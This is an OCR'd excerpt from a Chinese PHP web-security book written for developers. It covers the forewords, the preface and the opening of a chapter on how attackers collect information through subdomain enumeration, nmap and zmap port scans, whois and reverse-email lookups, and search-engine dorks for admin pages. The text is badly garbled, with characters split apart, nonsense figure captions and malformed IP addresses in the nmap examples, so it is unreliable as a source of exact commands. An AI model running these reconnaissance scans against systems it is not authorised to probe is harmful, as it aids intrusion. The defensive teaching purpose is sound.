从 常见 的 网 络 攻击 入 手 ， 介 绍 代码 安全 、 前 端 脚本 安全 、 后 端 应 
用 安全 、 账 户 安全 、 加 解密 及 认证 技术 、SQL 注 入 以 及 服务 器 配 
置 防护 等 安全 知识 ， 以 案例 揭示 安全 漏洞 并 提供 解决 方案 。 
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推荐 序 1 


随 着 互联 网 的 快速 发 展 以 及 大 量 中 小 型 互联 网 公司 的 出 现 ， 网 络 用 户 数 也 在 不 断 增 
长 ， 用 户 安 全 意识 不 断 提升 ， 人 们 越 来 越 注重 个 人 隐私 及 数据 安全 的 防护 ， 出 现 用 户 密 
码 泄露 、 隐 私 外 泄 、 财 产 损失 等 都 是 不 能 忍受 的 。 


目前 大 多 数 中 小 型 公司 都 在 用 PHP 开发 Web 端 ， 但 这 些 公司 往往 缺乏 安全 相关 的 
技术 团队 来 为 网 络 安全 方面 提供 技术 保障 。 尤 其 在 开发 过 程 中 ， 工 程 师 忽略 安全 方面 的 
考虑 ， 导 致 线 上 网 站 服务 器 出 现 各 种 安全 漏洞 ， 留 下 安全 隐患 ， 对 用 户 和 公司 都 会 造成 
不 同 程度 的 损失 。 


加 上 近 些 年 各 大 互联 网 公司 陆续 曝 出 被 攻击 的 安全 问题 ， 大 量 账户 和 密码 泄露 。 例 
如 有 些 用 户 在 很 多 网 站 都 使 用 同一 账户 和 密码 ,使 得 黑客 更 容易 破解 他 在 其 他 网 站 的 账 
户 信息 。 类 似 问 题 让 企业 在 安全 性 方面 面临 严峻 挑战 ， 可 以 说 一 个 网 站 没有 安全 ， 就 像 
没有 穿 衣服 一 样 ， 它 是 裸露 透明 的 ， 一 丝 不 挂 ， 毫 无 隐私 和 保障 可 言 。 


纵 观 市 场 ， 很 少 有 类 似 结合 实际 案例 著作 的 Web 安全 方面 的 图 书 ， 本 书 正 是 基于 
此 ， 总 结 作者 在 安全 方面 的 经 验 ， 循 序 渐进 地 讲述 大 量 实际 发 生 的 案例 以 及 处 理 方案 
来 应 对 各 种 新 奇 的 攻击 技术 。 从 常见 的 网 络 攻击 、 代 码 安全 、 前 端 脚 本 安全 、 后 端 应 用 
安全 、 账 户 安全 、 加 解密 及 认证 、SQL 注入 以 及 服务 器 配置 防护 等 方面 提供 了 比较 成 熟 
的 技术 解决 方案 。 


通过 阅读 本 书 能 够 帮助 读者 对 整个 网 络 安全 有 一 个 全 新 的 认识 和 质 的 提升 ， 从 而 成 
为 一 位 懂 安 全 、 会 防护 的 工程 师 ， 避 免 在 工作 中 成 为 黑客 的 攻击 对 象 。 


总 之 ， 这 是 开发 工程 师 在 安全 方面 不 可 多 得 的 一 本 网 络 安全 图 书 ， 值 得 一 读 。 





爱 卡 汽车 高 级 工程 师 张 锋 


推荐 序 2 


安全 是 一 个 系统 工程 ， 涉 及 项 目 管理 、 架 构 设 计 、 代 码 编写 等 方面 。 一 位 合格 的 开 
发 人 员 除 了 要 有 安全 意识 外 ,还 要 掌握 一 些 安全 编程 的 知识 点 。 这 本 书 为 开发 人 员 介 绍 
了 一 些 Web 安全 的 基础 知识 ， 分 别 以 原理 、 实 践 两 个 方面 进行 了 阐述 ，Web 安全 入 门 
简单 ， 重 要 的 是 实践 和 积累 。 





看 雪 学 院 (kanxue.com) 创始 人 段 钢 


了 


前 


在 准备 写 这 本 书 的 时 候 参考 了 很 多 Web 安全 方面 的 资料 和 书籍 ， 我 发 现 很 多 书籍 
和 资料 都 是 从 攻击 者 的 角度 来 讲述 Web 安全 的 。 为 了 防止 本 书 和 其 他 的 书籍 以 及 相关 
资料 同 质 化 ， 在 规划 本 书 的 时 候 ， 特 意 从 PHP 开发 者 的 角度 出 发 ， 目 的 是 让 开发 者 提 
升 安全 开发 的 能 力 ， 书 中 会 讲 到 目前 Web 安全 中 的 常见 漏洞 、 相 关 的 漏洞 案例 、 最 佳 
的 安全 防范 方法 ， 以 及 我 自己 的 观点 ， 和 希望 能 帮 有 到 需要 提升 安全 知识 的 PHP 从 业者 。 


本 书 内 容 


第 1 章 信息 泄露 


此 书面 向 安全 意识 薄弱 的 开发 者 ， 因 此 在 第 1 章 中 带领 读者 入 门 ， 主 要 介绍 攻击 者 
在 攻击 服务 器 时 在 前 期 如 何 探查 服务 器 信息 ， 攻 击 者 有 哪些 手段 来 挖掘 漏洞 ， 让 读者 能 
够 快速 了 解 漏洞 是 如 何 被 发 现 的 。 

第 2 章 常规 漏洞 

讲解 开发 者 在 编码 过 程 中 ， 因 缺乏 安全 意识 或 遗漏 而 导致 的 安全 问题 ; 同时 通过 生 
动 的 案例 分 析 来 说 明 攻 击 者 是 如 何 发 现 此 类 安全 问题 的 ; 最 后 在 章节 末尾 会 提 到 开发 者 
如 何 规避 这 些 编码 导致 的 安全 问题 。 

第 3 章 业务 逻辑 安全 

在 设计 一 些 业 务 的 时 候 ， 不 仅 编码 会 产生 安全 漏洞 ， 业 务 同 样 会 产生 大 问题 ， 比 如 
常见 的 越权 漏洞 、 支 付 漏洞 、 验 证 码 问题 ， 这 些 问题 其 实在 设计 功能 之 初 就 应 该 考虑 到 
项 目 计 划 中 去 。 

第 4 章 LANMP 安全 配置 

对 于 PHP 开发 者 来 说 , 一 定 离 不 开 Nginx、Apache、MySQL、PHP、Redis 等 配置 ， 
不 过 这 些 配置 并 不 会 经 常用 到 ， 通 常 是 配置 一 次 ， 后面 就 不 用 再 理会 。 这 也 导致 了 开发 
者 因为 对 配置 的 陌生 而 出 现 不 少 安全 问题 ， 本章 会 总 结 出 因为 配置 不 当 而 带 来 的 安全 问 
题 ， 同 时 也 会 给 出 正确 的 安全 配置 建议 。 





PHP Web 安全 开发 实战 
第 5 章 ”认证 与 加 密 
在 进行 业务 开发 的 过 程 中 ， 我 们 很 频繁 地 使 用 加 密 与 解密 ， 但 对 其 底层 原理 却 了 解 


得 甚 少 ， 甚 至 部 分 开发 者 无 法 分 清 认 证 与 加 密 的 区 别 ， 本 章 主 要 介绍 加 密 和 认证 的 相关 
技术 ， 以 帮助 开发 人 员 了 解 其 技术 特点 ， 从 而 开发 出 安全 的 应 用 。 


第 6 章 其 他 Web 安全 主题 


攻击 者 的 攻击 方式 是 多 样 的 ， 我 们 在 防范 安全 问题 的 同时 ， 一 定 要 有 重点 目标 ， 所 
以 本 章 会 提 到 漏洞 的 危险 等 级 划分 、CMS 引起 的 漏洞 如 何 防 御 、 对 自身 的 业务 如 何 安 
全 测试 、 在 测试 的 同时 如 何 提升 效率 ， 本 章 还 会 介绍 两 款 经 典 的 安全 检测 工具 : 
Burp Suite 和 SQLMap， 让 读者 能 够 对 自己 开发 的 产品 进行 安全 检测 。 


本 书 读者 对 象 


这 本 书面 向 懂 PHP 开发 但 不 擅长 安全 方面 的 开发 者 ， 可 以 通过 此 书 让 你 在 Web 安 
全 方面 快速 成 长 ， 在 书 中 列 出 了 很 多 互联 网 的 漏洞 案例 ， 目 的 是 让 读者 看 了 之 后 更 加 了 
解 攻击 者 是 如 何 发 现 漏洞 的 ， 从 而 让 开发 者 在 开发 时 能 够 对 症 下 药 。 


由 于 编者 水 平 有 限 ， 虽 已 尽力 ， 但 书 中 肯定 还 会 存在 许多 不 妥 甚 至 谬误 ， 敬 请 广大 
读者 和 专家 不 音 指教 ， 非 常 感谢 。 


联系 邮箱 地 址 ;booksaga@126.com。 


汤 青 松 
2018 年 4 月 于 北京 
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信息 泄露 





安全 是 一 个 整体 , 不 在 于 强大 的 地 方 有 多 强大 ,而 在 于 弱小 的 地 方 有 多 弱 。 一 个 系统 被 
攻击 的 原因 有 很 多 ， 比 如 有 信息 泄露 、 编 码 问题 、 业 务 逻 辑 问题 、 配 置 不 当 等 方面 ， 而 其 中 
信息 泄露 是 一 个 不 小 的 原因 。 攻 击 者 要 入 侵 一 个 网 站 ， 首 要 就 是 收集 目标 的 更 多 信息 ， 其 中 
有 些 信 息 对 于 开发 者 来 说 或 许 并 不 在 意 , 但 攻击 者 获取 这 些 信息 之 后 却 可 以 以 更 低 成 本 攻击 
系统 ， 比 如 当 攻 击 者 得 到 该 站 点 的 端口 信息 之 后 ， 就 可 以 分 析出 目标 网 站 提供 了 哪 种 服务 
再 对 这 些 服务 的 弱点 进行 定向 攻击 。 

本 章 将 从 一 个 攻击 者 的 角度 来 分 析 攻 击 者 收集 信息 的 意义 以 及 利用 的 方法 , 包括 主机 信 
息 泄露 、 源 码 信 息 、 弱 口令 信息 ,希望 可 以 通过 本 章 的 内 容 让 读者 了 解 攻击 者 是 如 何 收集 服 
务 器 信息 的 ， 从 而 把 一 些 以 往 容易 忽视 的 地 方 重视 起 来 。 


1.1 主机 信息 














一 个 网 站 被 攻击 , 通常 情况 是 指 服务 器 主机 受到 了 攻击 , 而 要 攻击 服务 器 主机 ,首要 的 
操作 就 是 收集 服务 器 的 弱点 信息 ， 这 些 信息 包 括 子 域名 收集 、 端 口 信息 、 域 名 注册 信息 、 网 
站 管理 地 址 ， 本 节 将 介绍 攻击 者 收集 主机 信息 的 方法 。 
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1.1.1 子 域名 信息 


子 域名 是 指 顶 级 域名 、 一 级 域名 或 父 域 名 的 下 一 级 ， 域 名 整体 包括 两 个 “.” 或 包括 一 
个 “.” 和 一 个 “/”。 在 攻击 者 收集 信息 时 ， 首 先 就 是 发 现 目标 ， 而 通过 子 域名 收集 的 方式 
可 以 迅速 发 现 更 多 目标 主机 ， 找 到 更 多 目标 则 能 挖掘 出 更 多 弱点 信息 ， 比 如 当 发 现 某 域名 存 
在 一 个 admin.xxx.com 子 域名 后 ， 就 大 致 可 以 推测 此 域名 是 网 站 后 台 ， 这 样 攻击 者 就 可 能 
绕 着 后 台 来 进行 攻击 ， 所 以 对 于 攻击 者 来 说 ， 子 域名 收集 可 以 很 大 程度 地 降低 攻击 成 本 。 

现在 假设 要 查询 bing.com 域 名 还 有 多 少子 域名 , 攻击 者 会 怎么 做 呢 ? 下 面 来 看 一 下 常见 
的 域名 收集 方式 。 

1. 浏览 器 访问 

浏览 器 访问 是 判断 一 个 子 域名 是 否 存 在 的 最 简单 的 方法 ， 例 如 通过 浏览 器 尝试 子 域名 
api.bing.com 是 否 可 以 访问 ， 如 果 服 务 器 返回 的 状态 码 为 200， 就 说 明 目 标 地 址 是 存在 的 ， 
表示 子 域名 可 以 访问 。 如 果 是 其 他 状态 码 ， 那 么 可 以 对 应 HTTP 状 态 码 来 判断 。 有 关 HTTP 
状态 码 可 参考 百度 百科 “HTTP 状 态 码 ”的 内 容 。 如 图 1-1 所 示 ， 表 示 子 域名 api.bing.com 不 可 
以 访问 ， 如 图 1-2 所 示 表 示 子 域名 可 以 访问 。 











apibing.com 


Not Found 


TTP Error 404. The requested resource is not found. 





图 1-1 子 域名 api.bing.com 不 可 以 访问 








图 1-2 子 域名 可 以 访问 
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2. 搜索 引擎 查找 

如 果 不 知道 域名 有 多 少 个 子 域名 , 想 寻 找 域名 下 有 多 少子 域名 , 可 以 借助 搜索 引擎 的 查 
询 指令 来 帮 且 寻找 ， 比 如 site:songboy.net 。 在 如 图 1-3 所 示 中 ， 我 们 可 以 看 到 根 域名 
site:songboy.net 下 百度 记录 了 5 个 子 域名 。 





ee 
Bai 全 百度 site:songboy net 
网 页 新 闻 贴吧 知道 音乐 图 片 视频 地 图 文库 更 多 » 















所 有 网 页 时 间 不 限 所 有 网 页 和 文件 songboy.net 消除 


找到 相关 结果 数 约 5 个 
数字 为 售 算 值 。 网 站 管理 员 如 需 了 解 更 准确 的 索引 量 ， 请 使 用 百度 站 长 平台 


亲王 。 去 注 于 分 享 互联 网 开发 技术 文档 .前沿 科技 资讯 。， 轻 检阅 读 PHP 学 
习 心 得 Mac/Linux WEB 安 全 数据 库 工作 日 记 WEB 前端 科技 人 文 移 
动 互联 设计 /于 村 工具 /APP 
二 aerecaumiaa 。 Www .songboy net/ ~ - 百度 快照 
和 岛 起 云 购 
收藏 马 示 去 购 官方 短信 乌 叔 云 购 简介 手机 版 官方 QQ 群 您 好 ,欢迎 光临! 登录 | 注册 我 的 乌 皮 
云 购 帮助 在 线 客服 000-123456 
yyyg niaoshu_songboy net/ ~ -百度 快照 


欢迎 来 到 SQLMAP Web GUI 

Time Delay Between HTTP Requests: HTTP User-Agent String to Use: HTTP Request 
Timeout: HTTP Host Header String to Use: Number of Retries on HTTP Re 
websqimap songboy net/ ~ - 百度 快照 


和 鸟 起 小 京东 v4 2 分 销 版 









图 1-3 site:songboy.net 域名 下 的 子 域名 





3. Layer 

攻击 者 在 对 目标 有 强烈 的 渗透 欲望 时 , 就 会 更 加 愿意 花费 时 间 , 因此 会 用 一 些 工 具 来 畏 
助 ， 虽 然 下 载 工具 麻烦 一 些 ， 不 过 挖掘 效果 确实 更 加 好 。 

工具 “Layer 子 域名 挖掘 机 ”是 一 款 使 用 NET 开 发 的 Windows 平 台 软件 ，Layer 可 以 用 来 
快速 查找 子 域名 信息 。 如 果 没 有 安装 ,NET 环境 ， 在 Windows 10 环 境 打开 会 自动 安装 ， 网 速 
比较 好 的 情况 下 安装 时 间 在 5 分 钟 左右 。 

安装 好 之 后 打开 界面 ， 如 图 1-4 所 示 ， 需 要 输入 目标 网 址 ， 单 击 “ 开 始 ” 按 钮 就 可 以 在 
下 面 的 列表 中 看 到 挖掘 到 的 子 域名 结果 ， 在 Windows 系 统 中 操作 起 来 非常 方便 。 
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六 Layer 子 域名 拉 二 机 V3.1 一 x 
域名 : [se com 篇 正 去 重 | 回 及 可 回 景 力 榴 举 ” 回 同 服 这 握 线程 : [500 过: 

了 域名 裔 本 2 服务 器 来 源 

1 = 本 力 要 半 

{403) 已 禁止 最 力 术 兰 

3 正常 访问 最 力 术 兰 

4 正当 访问 时 力 权 半 

5 正 党 访问 最 力 术 兰 
域名 总 扫 : 2 进度 : 服务 接口 模式 运行 中 术 ! 岩 做 态 : (314/26073) 63 so com 作者 : Sewy 访问 博客 








图 1-4 Layer 子 域名 挖掘 机 操作 界面 


4. wydomain 
[ 具 “wydomain” 是 白 帼 子 “ 猪 猪 侠 ”开发 的 一 款 子 域名 挖掘 工具 (如 图 1-4 所 示 〉， 
该 工具 可 以 通过 命令 行 交互 来 获取 子 域名 信息 ， 目 前 在 GitHub 开 源 ， 项 目地 址 为 : 
https://github.com/ring04h/wydomain。wydomain 的 帮助 文档 如 图 1-5 所 示 。 





$ python dnsburte.py —h 
usage: dnsburte.py [-h] [-t] [-d] [-f] [-o] 


wydomian v 1.2.0 to bruteforce subdomains of your target domain . 


optional arguments: 


-h, --help show this help message and exit 


-t, --thread thread count 
domain name 
subdomains dict file name 


-0 , --Out result out file 





图 1-5 wydomain 的 帮助 文档 


wydomain 是 基于 Python 开 发 的 ,在 运行 的 时 候 需 要 先 安装 Python 环 境 , 挖掘 的 原理 是 基 
于 常见 的 子 域名 字典 探测 , 工具 中 默认 提供 一 些 字典 表 , 如 果 使 用 者 想 自 己 添加 也 非常 方便 ， 
把 需要 挖掘 的 子 域名 放 到 CSV 文 件 中 即 可 。wydomain 的 帮助 文档 如 图 1-5 所 示 。 
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字典 是 指 一 个 包含 很 多 密码 的 文本 文件 , 攻击 者 常用 相关 软件 将 数字 、 字 母 、 符 号 等 按 
照 特定 组 合 方式 生成 字典 文件 ， 然 后 通过 特定 软件 使 用 字典 中 的 密码 不 断 尝试 ， 直 到 成 功 。 
该 过 程 被 称 为 暴力 破解 ， 也 叫 穷 举 或 跑 字 典 。 
扫描 域名 的 过 程 及 扫描 结果 如 图 1-6 和 图 1-7 所 示 。 




















2018-01-05 22:24:29,845 [INFO] starting bruteforce threading 


2018-01- 6,186 [INFO] dns brute: > 
2018-01-05 22:26:16,186 [INFO] result save in : C:\Users\Administrator\ 


Desktop\wydomain-wydomain2\songboy.log (11001u.songboy.net', 'A', '<timeout>') 





图 1-6 扫描 域名 的 过 程 





"11001u. 


nghbr 


gboy.net", 
songhoy.net", 
t", 





图 1-7 扫描 后 的 结果 

1.1.2 ”端口 信息 

攻击 者 欲 找 到 目标 , 最 常用 的 方法 就 是 端口 扫描 ,。 顾名思义 ,端口 扫描 就 是 逐个 对 一 段 
端口 或 指定 的 端口 进行 扫描 。 攻 击 者 可 以 通过 扫描 结果 知道 一 台 计算 机 上 都 提供 了 哪些 服 
务 , 之 后 可 以 通过 所 提供 服务 的 已 知 漏洞 进行 攻击 , 比如 当 攻 击 者 发 现 服务 器 开放 了 80 端 口 ， 
就 知道 服务 器 提供 了 Web 服 务 ， 再 比如 当 发 现 开 放 了 3306 端 口 ， 则 可 以 判断 服务 器 安装 了 
MySQL 服 务 ， 此 时 攻击 者 就 会 从 Web 服 务 和 MySQL 服 务 的 弱点 进行 攻击 。 

1. 端口 扫描 原理 








当 一 个 攻击 者 向 服务 器 的 一 个 端口 发 起 建立 连接 的 请 求 时 , 如 果 服务 器 提供 此 项 服务 就 
会 应 答 ， 如 果 服 务 器 未 提供 此 项 服务 ， 即 使 攻击 者 向 相应 的 端口 发 出 请 求 ， 服 务 器 也 是 不 会 
应 答 的 。 

利用 这 个 原理 , 攻击 者 对 所 有 熟知 的 端口 分 别 建立 连接 , 并 记录 下 远 端 服务 器 所 返回 的 
内 容 ， 最 后 查看 一 下 记录 就 能 知道 目标 服务 器 上 都 安装 了 哪些 服务 ， 这 就 是 端口 扫描 ， 通 过 
端口 扫描 ， 攻 击 者 就 可 以 搜集 到 关于 服务 器 的 各 种 很 有 参考 价值 的 信息 。 
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假设 现在 攻击 者 要 针对 主机 Localhost 获 取 开启 端口 信息 , 那么 可 能 会 用 到 两 款 非常 经 典 
的 工具 ， 分 别 是 NMap 和 ZMap 端 口 扫描 器 。 下 面 分 别 介绍 这 两 款 工具 的 演示 操作 。 


2. NMap 


NMap 英 文 全 称 是 Network Mapper， 最 开始 是 Linux 下 的 网 络 扫描 工具 包 ， 现 在 在 
Windows 平 台 也 有 。 考 虑 到 Linux 0 J 简便 性 ， 这 里 用 Linux 教 大 家 安装 NMap， 在 
CentOS 中 使 用 yum -y install nmap 命令 开始 安装 。 

安装 之 后 ,在 界面 中 输入 nmap， 不 带 任何 命令 行 参数 ， 如 果 能 看 到 如 图 1-8 所 示 的 提示 ， 
就 说 明 已 经 安装 成 功 了 。 


MORE OPTIONS AND EXAMPLE 





图 1-8 NMap 安装 成 功 的 信息 


接 下 来 开始 使 用 NMap 做 一 些 试验 .NMap 支 持 4 种 基本 的 扫描 方式 ,分 别 是 TCP Connect、 
TCP SYN、UDP、Ping， 在 这 里 不 介绍 这 4 种 方式 的 具体 原理 ， 大 家 可 以 用 NMap 扫 描 指定 服 
务 器 端口 试 试 。 下 面 介绍 几 个 常用 的 命令 。 


多 nmap localhost 通过 主机 名 扫描 服务 器 ， 如 图 1-9 所 示 。 





图 1-9 通过 主机 名 扫描 服务 器 
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多 nmap 127.0.0.1 通过 JIP 地址 扫描 服务 器 ， 如 图 1-10 所 示 。 





图 1-10 通过 IP 地 址 扫描 服务 器 


由 图 1-10 中 的 信息 可 以 看 到 , 无 论 是 通过 主机 名 还 是 IP 地 址 扫描 都 返回 了 主机 开放 的 端 
口号 ， 并 且 可 猜测 端口 号 对 应 的 服务 ， 比 如 22 端 口 提示 SSH 服 务 、80 端 口 是 HTTP、443 端 口 
是 HTTPS、3306 端 口 识别 出 为 MySQL 服 务 。 


下 面 将 提供 一 些 扫描 目标 服务 器 的 常见 命令 。 

扫描 一 个 网 段 端 口 

nmap 191.2.168.1.1.1/24 

扫描 多 个 目标 ， 命 令 如 下 : 

nmap 191.2.168.1.1.2 191.2.168.1.1.5 

扫描 一 个 范围 内 的 目标 ， 命 令 如 下 : 

nmap 191.2.168.1.1.1-100 (扫描 IP 地 址 为 191.2.168.1.1.1-191.2.168.1.1.100 内 的 所 有 主机 ) 

如 果 你 有 一 个 IP 地 址 列表 ， 将 其 保存 为 一 个 TXT 文 件 ， 和 NMap 存 放 在 同一 目录 下 ， 就 
可 以 扫描 这 个 TXT 文 件 内 的 所 有 主机 ， 命 令 如 下 : 

nmap -iL target.txt 

如 果 你 想 看 到 扫描 的 所 有 主机 列表 ， 用 以 下 命令 : 

nmap -sL 191.2.168.1.1.1/24 

扫描 排除 某 一 个 下 外 的 所 有 子 网 主机 ， 命 令 如 下 : 

nmap 191.2.168.1.1.1/24 -exclude 191.2.168.1.1.1 

扫描 排除 某 一 个 文件 中 的 他 外 的 子 网 主机 ， 命 令 如 下 : 

nmap 191.2.168.1.1.1/24 -exclude file ip.txt(ip.txt 中 的 文件 将 会 从 扫描 的 主机 中 排除 
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3. ZMap 


通过 NMap 的 使 用 ， 已 经 大 致 清楚 怎么 用 工具 检查 开放 的 端口 信息 ， 下 面 再 看 看 另 
扫描 端口 的 工具 ZMap。ZMap 和 NMap 的 实现 原理 略 有 不 同 ，ZMap 扫 描 速 度 更 快 ， 官 方 号 称 
可 以 一 小 时 扫描 整个 互联 网 的 主机 。 下 面 通过 ZMap 扫 描 主 机 来 做 一 些 实验 ， 首 先 需要 安装 
ZMap。 








apt-get install libgmp3-dev libpcap-dev gengetopt. 
wget https://github.com/zmap/zmap/archive/v1.1.0.1.3.tar.gz. 
tar ~zxvf v1.1.0.1.3.tar.gz. 





cd zmap-1.1.0.3/src. 





make && make install . 





成 后 ， 可 以 用 zmap --help 来 验证 是 否 安装 成 功 ， 如 图 1-11 所 示 是 安装 成 功 并 验证 
后 的 返回 结果 。 





图 1-11 ZMap 安装 成 功 后 的 验证 信息 


现在 已 经 安装 成 功 了 ， 接 下 来 开始 做 测试 。 假 设 攻击 者 要 通过 扫描 获取 公 网 中 开启 443 
端口 的 主机 ， 此 时 攻击 者 只 需要 输入 命令 zmap -p 443 即 可 ， 如 图 1-12 所 示 ，ZMap 正 在 扫 
描 ， 并 能 看 到 扫描 的 进度 。 








图 1-12 扫描 开启 443 端口 的 主机 信息 
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按 回 车 键 之 后 ， 开 始 扫描 ， 当 然 大 多 数 情况 下 会 指定 一 个 网 段 来 扫描 。 下 面 给 大 家 整理 


和 





一 批 常用 的 命令 ， 可 以 用 来 作为 参考 。 


基本 选项 

这 些 选项 是 在 扫描 中 常用 的 。 

多 -p, -target-port=port 需要 扫描 的 TCP 端口 号 (比如 443 ) 。 

多 -0, -output-file=name 将 扫描 结果 输出 到 文件 中 。 

4 -b, -blacklist-file=path 黑 名 单 文 件 ， 即 排除 在 扫描 范围 外 的 地 址 。 

4 在 conf/blacklist.example 文件 中 有 实例 ， 同 一 行 写 一 个 网 段 ， 比 如 191.2.168.0.0/16。 


扫描 选项 


4 -n,max-targets=n 检测 的 上 限 范围 ， 可 以 是 一 个 数字 ( 如 -n 10000) ， 也 可 以 是 扫 


描 地 址 空间 中 的 百分比 。 

-N, -max-results=n ”接收 到 一 定数 量 的 结果 后 退出 扫描 。 

-t, -max-runtime=secs 最 大 扫描 (发 包 ) 时间 。 

-0 -rate=pps 设置 发 包 速 率 (packets/sec ) 。 

-B, -bandwidth=bps 设置 发 包 带 宽 (bits/second ) 。 

-c, -cooldown-time=secs 接受 返回 的 时 间 ( default=8 ) 。 

-e, -seed=n 选择 地 址 的 排列 序号 。 

-T -sender-threads=n 发 包 的 线程 数 (默认 为 1) 。 

-P, -probes=n 送 达 每 个 IP 的 探测 器 数量 (默认 为 1) 。 
络 选 项 

-s, -Source-port=portlrange 发 包 的 源 端 口 (s) 。 

-S, -source-ip=iplrange 发 包 的 源 卫 ， 也 可 以 是 IP 地 址 段 。 

-G, -gateway-mac=addr 发 包 的 网 关 MAC 地 址 。 


-i, -interface=name 网 络 端口 。 


2 多 


4 4 习 


探测 器 选项 

多 -list-probe-modules 列 出 可 用 的 探测 器 模块 。 

4 -M, -probe-module=name 选择 探测 器 模块 (默认 为 tcp_synscan ) 。 
多 -probe-args=args 设置 探测 器 模块 的 参数 。 

多 -listoutput-fields 列 出 所 选择 的 探测 器 模块 。 


输出 选项 
-listoutput-modules 列 出 所 有 输出 模块 。 
4 -0, -output-module=name 设置 输出 模块 。 
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多 -output-args=args 设置 输出 模块 的 参数 。 
4 -二 output-fields=fields 列 出 所 选择 的 输出 模块 。 
多 -output-filter 输出 模块 过 滤器 。 


附加 选项 

-C, -config=filename 读 一 个 配置 文件 ， 其 中 可 以 包含 特殊 的 选项 。 
-q, -quiet 安静 模式 。 

-g, -Summary 在 扫描 结束 后 ， 打 印 配置 和 结果 汇总 。 

-Vv, -verbosity=nlog 日志 的 等 级 (0~S， 默 认为 3) 。 

-h, -help 显示 帮助 。 

-V, -version 打印 版 本 。 


HHH 人 HH 


4. 小 结 


攻击 者 通过 端口 扫描 器 自动 检测 主机 端口 , 可 以 不 留 痕迹 地 发 现 服务 器 的 各 种 TCP 端 口 
的 分 配 及 提供 的 服务 和 它们 的 软件 版 本 , 这 就 让 攻击 者 间接 地 了 解 到 服务 器 可 能 存在 的 安全 
问题 ， 因 此 我 们 需要 尽 可 能 屏蔽 这 些 信息 。 
1.1.3 ”域名 注册 信息 

注册 域名 会 留 下 一 些 管 理 员 信息 ， 比 如 邮箱 地 址 ,而 这 些 信息 通常 是 对 外 公开 的 ， 大 部 
分 人 会 觉得 这 些 信息 公开 无 所 谓 , 但 攻击 者 却 可 以 通过 这 些 信息 挖 掘 到 网 站 管理 员 信 息 , 通 
过 一 些 社工 库 反 查 出 管理 员 信息 ， 再 反 推出 管理 员 的 常用 账号 、 密 码 去 登录 网 站 后 台 。 

假设 网 站 管理 员 的 邮箱 是 12345678@qq.com， 那 么 攻击 者 是 否 可 以 猜测 出 管理 员 的 QQ 
号 码 为 12345678 呢 ? 当 攻 击 者 往 这 个 方向 去 查 的 时 候 , 就 可 以 通过 一 些 社工 库 来 得 到 管理 员 
平时 喜欢 用 什么 账号 和 密码 ， 当 得 到 管理 员 的 常用 账号 后 ， 青 去 目标 站 点 后 台 尝 试 登录 。 下 
面 介绍 一 下 攻击 者 常用 的 实施 方式 。 

攻击 者 如 果 能 得 到 管理 员 的 部 分 信息 , 就 可 能 衍生 出 多 种 攻击 方法 , 比如 攻击 者 向 网 站 
管理 员 发 送 一 个 钓鱼 网 址 来 骗取 管理 员 账 号 和 密码 ， 又 或 者 寻找 网 站 的 XSS、CSRF 漏 洞 ， 
然后 发 送 一 个 链接 ， 这 些 信息 的 泄露 都 有 可 能 增加 网 站 的 安全 风险 。 

1. whois 信息 

假设 攻击 者 现在 要 渗透 www.songboy.net 这 个 网 站 ， 如 何 通过 域名 来 获取 管理 员 信息 
呢 ? 又 该 获取 哪些 信息 以 及 获取 的 方法 是 什么 呢 ? 

最 简单 的 方式 是 使 用 whois 搜 集 信 息 ，whois 基 本 用 法 如 下 ， 以 songboy.net 为 例 : 

# whois admiralmarkets.com 








结果 如 图 1-13 所 示 。 





图 1-13 使 用 whois 获取 管理 员 信 息 


我 们 看 到 通过 上 述 命令 即 可 获得 下 面 的 信息 。 
久 Domain Name: 域名 。 

Registrant: 注册 人 姓名 。 

Registrant Contact Email: 注册 人 邮箱 。 
Registration time: 域名 注册 时 间 。 
Sponsoring Registrar: 注册 机 构 。 


. 邮箱 反 查 域名 


攻击 者 通过 whois 命 令 可 以 得 到 网 站 管理 员 的 邮箱 ， 接 下 来 就 可 以 通过 邮箱 反 查 管理 员 有 
哪些 域名 ， 具 体 的 查找 方法 可 以 在 浏览 器 中 打开 URL: http://whois.chinaz.com/reverse， 填 写 邮 
箱 地 址 ， 然 后 单 击 “ 查 看 分 析 ” 按 钮 ， 就 能 反 查 出 该 邮箱 的 其 他 域名 信息 ， 如 图 1-14 所 示 。 


AA 


D 











图 1-14 通过 邮箱 反 查 域名 


3. ICP 备案 查询 





国内 的 网 站 大 多 数 都 有 备案 , 攻击 者 也 可 以 通过 ICP 备 案 系统 查询 网 站 信息 , 查询 地 址 : 
http://www.miitbeian.gov.cn/publish/query/indexFirst.action ， 如 图 1-15 所 示 。 
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EE 




















图 1-15 通过 ICP 备案 查询 网 站 信息 

4. 小 结 

通过 上 面 3 种 方法 ， 相 信 读 者 已 经 知道 攻击 者 是 如 何 获取 管理 员 信息 的 ， 攻 击 者 得 到 了 
管理 员 信息 又 会 衍生 其 他 安全 风险 ， 因 此 管理 员 的 信息 保护 也 是 重要 的 一 环 。 另 外 ,攻击 者 
并 不 仅 限于 利用 上 面 3 种 方式 ， 读 者 可 以 先进 行 思考 ， 更 多 的 方法 会 在 后 面 提 到 。 
1.1.4 网 站 后 台地 址 

对 于 攻击 者 来 说 ， 后 台 更 加 能 引起 他 们 的 兴趣 ， 因 为 相 比较 前 台 来 说 ， 后 台 的 安全 性 更 
低 ， 而 且 拥有 的 权限 更 大 ， 如 果 能 进入 后 台 管理 系统 ， 那 么 拿 到 WebShell 可 能 也 就 不 远 了 。 

假设 现在 要 扫描 www.google.com 这 个 网 站 的 后 台 ， 攻 击 者 有 什么 办 法 拿 到 后 台地 址 
呢 ? 对 于 攻击 者 来 说 方法 有 很 多 ， 有 通过 CMS 的 一 些 特征 找 的 ， 有 通过 暴力 猜 解 的 ， 甚 至 有 
通过 社会 工程 学 的 ， 等 等 。 下 面 介绍 几 种 获取 后 台地 址 的 方法 。 

1. 使 用 搜索 引擎 查找 泄露 后 台地 址 


攻击 者 利用 搜索 引擎 作为 工具 即 可 获取 后 台地 址 ， 比 较 常 用 的 语法 是 : 

site:google.com inurl:admin (关键 字 ) . 

这 种 方法 最 关键 的 是 结合 Google 搜 索 语法 使 用 ， 现 在 假设 目标 为 : google.com， 那 么 攻 
击 者 在 Google 搜 索引 擎 中 输入 site:google.com inurl:php， 当 谷歌 搜索 引擎 碰 到 这 个 搜索 命令 
后 ， 会 列 出 google.com 域 名 下 面 所 有 收录 URL 中 包含 php 关 键 词 的 链接 ， 如 图 1-16 所 示 。 








Google seooooecon mpm 


2 














PHP | Google CloutLPatorm 
https/icoud google .con 上 php|” 一 译 此 页 


Google Cioud Piatorm makss development easy using PHP 


